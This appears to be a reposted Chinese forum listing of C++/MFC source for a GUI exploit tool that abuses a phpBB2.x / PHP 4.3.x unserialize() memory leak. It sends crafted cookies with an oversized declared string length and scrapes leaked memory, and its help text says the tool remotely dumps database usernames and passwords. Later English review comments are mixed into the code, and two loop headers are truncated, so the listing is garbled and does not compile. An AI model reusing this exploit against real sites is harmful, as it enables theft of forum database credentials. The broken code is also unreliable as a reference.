标题:PHPunserialize程序源代码
时间:2005-1-7 来源:不详 浏览数:

我看到有人回复想要看程序的源码,给帖出来了。

我的程序写的不好,所以以前没给源码。

主程序,用VC写的。很多注释开头的“//”被显示成了“file://”,这是这个系统的问题。

phpunserialize.cpp

 

// phpunserializeDlg.cpp : implementation file
//

#include "stdafx.h"
#include "phpunserialize.h"
#include "phpunserializeDlg.h"

#include "myfunc.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

#include
#pragma comment(lib,"ws2_32")

/////////////////////////////////////////////////////////////////////////////
// CAboutDlg dialog used for App About

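// Modal "About" dialog; its resource template is IDD_ABOUTBOX.
// The ClassWizard marker comments below had been rendered as "file://..." on the
// page; they are restored to ordinary "//" comments so the class body parses.
class CAboutDlg : public CDialog
{
public:
 CAboutDlg();

// Dialog Data
 //{{AFX_DATA(CAboutDlg)
 enum { IDD = IDD_ABOUTBOX };
 //}}AFX_DATA

 // ClassWizard generated virtual function overrides
 //{{AFX_VIRTUAL(CAboutDlg)
 protected:
 virtual void DoDataExchange(CDataExchange* pDX);    // DDX/DDV support
 //}}AFX_VIRTUAL

// Implementation
protected:
 //{{AFX_MSG(CAboutDlg)
 //}}AFX_MSG
 DECLARE_MESSAGE_MAP()
};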

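// Constructs the About dialog from its resource template (CAboutDlg::IDD).
// The dialog has no data members to initialise; the AFX_DATA_INIT markers are
// kept as plain comments (the page had rendered them as "file://...").
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
 //{{AFX_DATA_INIT(CAboutDlg)
 //}}AFX_DATA_INIT
}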

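// DDX/DDV hook for the About dialog. No controls are bound, so this only
// forwards to the base class. Marker comments restored from "file://" to "//".
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
 CDialog::DoDataExchange(pDX);
 //{{AFX_DATA_MAP(CAboutDlg)
 //}}AFX_DATA_MAP
}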

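// Message map for the About dialog; it declares no handlers of its own.
// Marker comments restored from "file://" to "//".
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
 //{{AFX_MSG_MAP(CAboutDlg)
  // No message handlers
 //}}AFX_MSG_MAP
END_MESSAGE_MAP()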

/////////////////////////////////////////////////////////////////////////////
// CPhpunserializeDlg dialog

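// Constructs the main dialog with every DDX-bound string empty and loads the
// application icon. The visible defaults are assigned later in OnInitDialog().
// NOTE(review): m_flag is not initialised here; it is first written in
// OnInitDialog(), so it must not be read before the dialog has been created.
// Marker comments restored from "file://" to "//".
CPhpunserializeDlg::CPhpunserializeDlg(CWnd* pParent /*=NULL*/)
 : CDialog(CPhpunserializeDlg::IDD, pParent)
{
 //{{AFX_DATA_INIT(CPhpunserializeDlg)
 m_strUrl = _T("");
 m_strPort = _T("");
 m_strUri = _T("");
 m_memread = _T("");
 m_strCookie = _T("");
 m_strContent = _T("");
 m_repeat = _T("");
 m_strshow = _T("");
 //}}AFX_DATA_INIT
 // Note that LoadIcon does not require a subsequent DestroyIcon in Win32
 m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}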

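// Binds each edit control to its CString member. UpdateData(TRUE) copies the
// controls into the members, UpdateData(FALSE) copies the members back.
// NOTE(review): every field is exchanged as free text with no DDV length or
// range validation, so callers receive whatever the user typed, at any length.
// Marker comments restored from "file://" to "//".
void CPhpunserializeDlg::DoDataExchange(CDataExchange* pDX)
{
 CDialog::DoDataExchange(pDX);
 //{{AFX_DATA_MAP(CPhpunserializeDlg)
 DDX_Text(pDX, IDC_URL, m_strUrl);
 DDX_Text(pDX, IDC_PORT, m_strPort);
 DDX_Text(pDX, IDC_URI, m_strUri);
 DDX_Text(pDX, IDC_MEMREAD, m_memread);
 DDX_Text(pDX, IDC_COOKIE, m_strCookie);
 DDX_Text(pDX, IDC_CONTENT, m_strContent);
 DDX_Text(pDX, IDC_REPEAT, m_repeat);
 DDX_Text(pDX, IDC_SHOW, m_strshow);
 //}}AFX_DATA_MAP
}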

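// Message map for the main dialog: system-menu commands, painting, the
// drag-icon query, and the IDOK2 button (handled by OnOk2).
// Marker comments restored from "file://" to "//".
BEGIN_MESSAGE_MAP(CPhpunserializeDlg, CDialog)
 //{{AFX_MSG_MAP(CPhpunserializeDlg)
 ON_WM_SYSCOMMAND()
 ON_WM_PAINT()
 ON_WM_QUERYDRAGICON()
 ON_BN_CLICKED(IDOK2, OnOk2)
 //}}AFX_MSG_MAP
END_MESSAGE_MAP()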

/////////////////////////////////////////////////////////////////////////////
// CPhpunserializeDlg message handlers

// One-time dialog setup: adds the "About..." entry to the system menu, installs
// the icons, fills every field with its default value and pushes the defaults
// to the controls. Returns TRUE so the framework assigns the initial focus.
BOOL CPhpunserializeDlg::OnInitDialog()
{
 CDialog::OnInitDialog();

 // The About command id has to lie inside the system-command range.
 ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
 ASSERT(IDM_ABOUTBOX < 0xF000);

 // Append a separator and the About entry, but only when the caption string
 // resource is present and non-empty.
 if (CMenu* pMenu = GetSystemMenu(FALSE))
 {
  CString caption;
  caption.LoadString(IDS_ABOUTBOX);
  if (!caption.IsEmpty())
  {
   pMenu->AppendMenu(MF_SEPARATOR);
   pMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, caption);
  }
 }

 // A dialog-based application has to set its own icons.
 SetIcon(m_hIcon, TRUE);   // big icon
 SetIcon(m_hIcon, FALSE);  // small icon

 // Default field values shown when the dialog opens.
 m_strUrl="127.0.0.1";
 m_strPort="80";
 m_strUri="/phpbb2/";
 m_strCookie="phpbb2mysql";
 m_memread="3000";
 m_repeat="1";
 m_strshow='N';

 // Help text shown in the output box (runtime string, kept verbatim).
 m_strContent="phpBB2.x&PHP4.3.x unserialize函数内存泄露漏洞利用程序\r\n\r\n"
  "程序可远程导出数据库用户名密码,有时延迟较长.\r\n要根据网站适当变换读取字节数,其他最好按默认.\r\n程序不是很健壮,得多试几次.\r\n"
  "COOKIE部分,要看程序的返回信息,有的系统是phpBB或phpBB2\r\n返回信息处输入'y'或者'Y'将返回详细信息\r\n\r\n"
  "作者:小花 QQ:56111981 http://xiaohuar.blogchina.com\r\n";

 // Copy the member values into the controls.
 UpdateData(FALSE);

 // 1 = keep running; OnOk2 toggles this flag and OnOK's loop reads it.
 m_flag=1;

 return TRUE;  // TRUE unless the focus was set to a control explicitly
}

// System-menu dispatcher: opens the About box for IDM_ABOUTBOX and hands every
// other command to the base class.
void CPhpunserializeDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
 // The low four bits of a system command id are masked off before comparing.
 const bool isAboutCommand = ((nID & 0xFFF0) == IDM_ABOUTBOX);
 if (!isAboutCommand)
 {
  CDialog::OnSysCommand(nID, lParam);
  return;
 }

 CAboutDlg aboutBox;
 aboutBox.DoModal();
}

// If you add a minimize button to your dialog, you will need the code below
//  to draw the icon.  For MFC applications using the document/view model,
//  this is automatically done for you by the framework.

void CPhpunserializeDlg::OnPaint()
{
 // A normal (non-minimised) window is painted entirely by the base class.
 if (!IsIconic())
 {
  CDialog::OnPaint();
  return;
 }

 // Minimised: erase the icon background, then draw the icon centred in the
 // client rectangle.
 CPaintDC paintDc(this);
 SendMessage(WM_ICONERASEBKGND, reinterpret_cast<WPARAM>(paintDc.GetSafeHdc()), 0);

 CRect client;
 GetClientRect(&client);

 const int iconWidth = GetSystemMetrics(SM_CXICON);
 const int iconHeight = GetSystemMetrics(SM_CYICON);
 const int left = (client.Width() - iconWidth + 1) / 2;
 const int top = (client.Height() - iconHeight + 1) / 2;

 paintDc.DrawIcon(left, top, m_hIcon);
}

// The system calls this to obtain the cursor to display while the user drags
//  the minimized window.
HCURSOR CPhpunserializeDlg::OnQueryDragIcon()
{
 // The dialog icon doubles as the drag cursor.
 HCURSOR dragCursor = static_cast<HCURSOR>(m_hIcon);
 return dragCursor;
}

// OK-button handler. Per the help text set in OnInitDialog, this is a
// proof-of-concept client for a phpBB2.x / PHP 4.3.x unserialize() memory
// disclosure. What the visible code does:
//   1. reads the dialog fields and builds the marker "Set-Cookie: <cookie>_data=";
//   2. resolves the host and builds one GET request whose "<cookie>_data" cookie
//      is a serialized string declaring m_memread bytes while carrying only the
//      5-byte value "test1";
//   3. up to m_repeat times: connects, sends the request, reads one response,
//      looks for the marker, and lists runs of characters accepted by goodcar()
//      from the cookie value the server sent back.
//
// Defender notes (all taken from the request text below):
//   - the tell-tale is a "<cookie>_data=s:<N>:" cookie whose declared length N
//     is far larger than the value that follows it;
//   - the request carries a fixed User-Agent, "Accept-Language: fr" and a
//     hard-coded "<cookie>_sid" value, all usable as log indicators;
//   - servers running PHP and phpBB releases that fix the unserialize() length
//     handling should not reflect memory here (fixed versions are not named on
//     this page).
//
// NOTE(review): the published listing is damaged. Two for-loop headers lost
// their text after "<" during HTML extraction (marked below) and comment
// markers were rendered as "file://". The block does not compile as shown and
// the missing text is not reconstructed here.
// NOTE(review): code-quality problems visible in this block: unbounded
// strcpy/strcat of user-supplied dialog fields into fixed stack buffers, early
// returns that skip WSACleanup(), an unchecked recv() result, and a local
// variable named `exit` that shadows the CRT exit() called earlier.
void CPhpunserializeDlg::OnOK() 
{
 // TODO: Add extra validation here
 UpdateData(TRUE);
 m_strContent="";
 // Marker searched for in the response: "Set-Cookie: <cookie>_data=".
 // NOTE(review): m_strCookie is user input of any length; these strcat calls
 // can write past the 512-byte buffer.
 char getrequest[512];
   
 strcpy(getrequest,"Set-Cookie: ");
 strcat(getrequest,(LPCTSTR)m_strCookie);
 strcat(getrequest,"_data=");

 // Declared string length placed in the cookie; zero or non-numeric input is
 // rejected (the message box text asks for a byte count).
 int nbmemread=atoi(m_memread);
 if(!nbmemread){MessageBox("请输入字节数");return;}

 // NOTE(review): no range check; values above 65535 are silently truncated.
 unsigned short urlport=atoi(m_strPort);

 // NOTE(review): "file:" in front of "//" here and below is the page-rendering
 // artifact, not part of the original comment.
 file://Create connection


 struct sockaddr_in mytcp;
 struct hostent * hp;
 unsigned int sock,addr,rc;

 memset(&mytcp, 0, sizeof(mytcp));

    WSAData wsadata;
 // A Winsock start-up failure terminates the whole process.
 if (WSAStartup(MAKEWORD(2, 0),&wsadata) != 0)exit(1);
    hp = gethostbyname(m_strUrl);
 
    // Fall back to parsing the field as a dotted IPv4 address.
    if (!hp){
  addr = inet_addr(m_strUrl);
 }
   // Neither lookup worked: report "cannot resolve <host>" and stop.
   if((!hp)&&(addr==INADDR_NONE))
   {
   m_strContent+="无法解析 ";
   m_strContent+=m_strUrl;
   UpdateData(FALSE);
   WSACleanup();
   return;
   }

   if(hp!=NULL)memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
   else mytcp.sin_addr.s_addr = htonl(addr);
      
   if(hp)mytcp.sin_family = hp->h_addrtype;
   else  mytcp.sin_family = AF_INET;

   mytcp.sin_port=htons(urlport);
  
   // NOTE(review): this return and the repeat check below leave without
   // calling WSACleanup().
   if(m_strUri==""){MessageBox("路径必须有值,可以为/");return;}
   // Request text. NOTE(review): URI, host, cookie name and byte count are
   // appended with no length check against the 1024-byte buffer.
   char sendrequest[1024]={0};
   strcat(sendrequest,"GET ");
   strcat(sendrequest,m_strUri);
   strcat(sendrequest," HTTP/1.1\nHost: ");
   strcat(sendrequest,m_strUrl);
   strcat(sendrequest,"\nAccept-Language: fr\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT 5.1)\nCookie: ");
   strcat(sendrequest,m_strCookie);
   // Serialized string: declared length m_memread, actual value "test1"
   // (%22 is a double quote, %3b a semicolon).
   strcat(sendrequest,"_data=s:");
   strcat(sendrequest,m_memread);
   strcat(sendrequest,":%22test1%22%3b; ");
   strcat(sendrequest,m_strCookie);
   // Hard-coded session id and cookie attributes; identical on every run.
   strcat(sendrequest,"_sid=1cfd759c33ba2a45b994c7b7cfd948ec; expires=Fri, 24-Dec-2005 21:25:37 GMT; path=/; domain=\nConnection: close\n\n");
  

   int repeat=atoi(m_repeat);
   if(repeat<=0){MessageBox("重复次数必须大于0");return;}
    // One connect / send / receive / scan cycle per iteration.
    do{
 
  sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
       // NOTE(review): Winsock reports failure as INVALID_SOCKET, not 0, so this
       // test does not catch a failed socket() call.
       if (!sock)
    { 
    MessageBox("无法连接");
       closesocket(sock);
 
       UpdateData(FALSE);
       WSACleanup();
    return;
    }
       m_strContent+="\r\n\r\n准备建立连接,";
       rc=connect(sock, (struct sockaddr *)&mytcp,sizeof(struct sockaddr_in));
  
      if(rc==0)
   {
   
    m_strContent+="连接成功\r\n";
    file://send the request
       // Sends the whole 1024-byte buffer, i.e. the request text plus its zero
       // padding, not just strlen(sendrequest) bytes.
       ::send(sock,sendrequest,sizeof(sendrequest),0);
    ::Sleep(2000);// pause 2000 ms before reading (the original comment said 5 seconds)
    // NOTE(review): a 1,000,000-byte automatic array; presumably close to or
    // above the thread's default stack size - confirm the linker settings.
    char getdata[1000000];// 1M of response data
    memset(getdata,0,sizeof(getdata));
    // Single recv(); the byte count and any error are ignored. The scan below
    // depends on the zero fill for termination, which is lost if the buffer is
    // filled completely.
    recv(sock,getdata,sizeof(getdata),0);
   
    // Optional dump of the raw response when the "show" field is Y or y.
    if(m_strshow=="Y"||m_strshow=="y"){m_strContent+=getdata;m_strContent+="\r\n\r\n";}

     // Sliding window the same length as the marker, compared after every byte.
     char signature[512];
  char *word,*wtmp,car;
  unsigned int cpt ,sizesign;
  unsigned int compteur,cptstr;
  // NOTE(review): shadows the CRT exit() used after WSAStartup above.
  BOOL exit = 0;
  sizesign = strlen(getrequest);
  memset(signature,'a',sizesign);
  signature[sizesign] ='\0';
  compteur = 0;
  cptstr = 0;
  int getdatacount=0;
  // Walk the response one character at a time until a NUL or until exit is set.
  while(!exit && (car=getdata[getdatacount++]))
  {
   // heap-detector addition (translated from the original French comment):
   // shift the window left by one and append the new character
   for(cpt = 0; cpt < (sizesign-1);cpt++)
    signature[cpt] = signature[cpt+1];
   signature[sizesign-1]=car;

   // Window equals the marker: the cookie value follows in the response.
   if(!strcmp(signature,getrequest))
   {
    // Output buffer sized at three bytes per requested byte, presumably to
    // hold %XX-escaped data - confirm against utf8decode().
    word = new char[nbmemread*3+1];
    word[cptstr] = '\0';
    compteur=strlen(intostr(nbmemread)) + 4;
    compteur+=compteur;
    // NOTE(review): loop header truncated in the published listing (everything
    // after "<" was lost); left exactly as found.
    for(cpt=0; cpt

    // Copy the cookie value until ';' or until the buffer cap is reached.
    while(!exit && (car=getdata[getdatacount++]))
    {
    if((car == ';') || (cptstr>= (nbmemread*3)))
     {
      exit = 1;
      continue;
     };
     word[cptstr] = car;
     cptstr++;
     word[cptstr] ='\0';
    };

    // utf8decode() comes from myfunc.h and is not shown; its return value
    // replaces nbmemread and is presumably the decoded length - TODO confirm.
    nbmemread = utf8decode(word);

    /*
    char allgoodchar[30000];
    memset(allgoodchar,0,sizeof(allgoodchar));
    int goodcharcount=0;
    */
    // NOTE(review): second truncated loop header (text after "<" lost); left
    // exactly as found.
    for(compteur=0;compteur    {
     // Advance cpt over a run of characters accepted by goodcar() (helper not
     // shown; presumably a printable-character test).
     for(cpt=compteur;goodcar(word[cpt]);cpt++);//{allgoodchar[goodcharcount]=word[cpt];goodcharcount++;}
    
     // Runs longer than one character are appended to the output box under
     // the label "probed string result:".
     if((cpt - compteur)>1)
     {
        wtmp = new char[(cpt - compteur)+1];
        strncpy(wtmp,&word[compteur],cpt - compteur);
        wtmp[cpt - compteur] = '\0';
    
     m_strContent+="探测字符串结果:";
        m_strContent+=wtmp;
     m_strContent+="\r\n";
        delete[] wtmp;
     }
     // An empty run still advances by one so the scan makes progress.
     if(!(cpt - compteur))cpt++;
     compteur = cpt;

    };


    delete[] word;
    file://m_strContent+=allgoodchar;
   };//End of (Set-Cookie marker found)

  
  };//End of While

    file://print the data
        
   }

    // connect() failed: report "connection failed" and stop.
    else {closesocket(sock); MessageBox("连接失败");  UpdateData(FALSE); WSACleanup(); return;   }
    shutdown(sock,1);
    closesocket(sock);
    repeat--;
 UpdateData(FALSE);
 // NOTE(review): Sleep() runs on the thread executing this handler, which is
 // presumably the UI thread; if so, the IDOK2 toggle cannot be processed while
 // the loop sleeps - confirm.
 ::Sleep(10000);// wait 10 seconds
 // m_flag == 0 (toggled by OnOk2) ends the loop early.
 if(m_flag==0)break;
 }while(repeat);


   m_strContent+="\r\n\r\n运行结束\r\n";
   UpdateData(FALSE);
   WSACleanup();

}

// IDOK2 button handler: flips m_flag between 0 and 1; any other value is left
// untouched. OnOK's repeat loop stops when it reads m_flag == 0.
void CPhpunserializeDlg::OnOk2() 
{
 if (m_flag == 0)
 {
  m_flag = 1;
  return;
 }

 if (m_flag == 1)
 {
  m_flag = 0;
 }
}

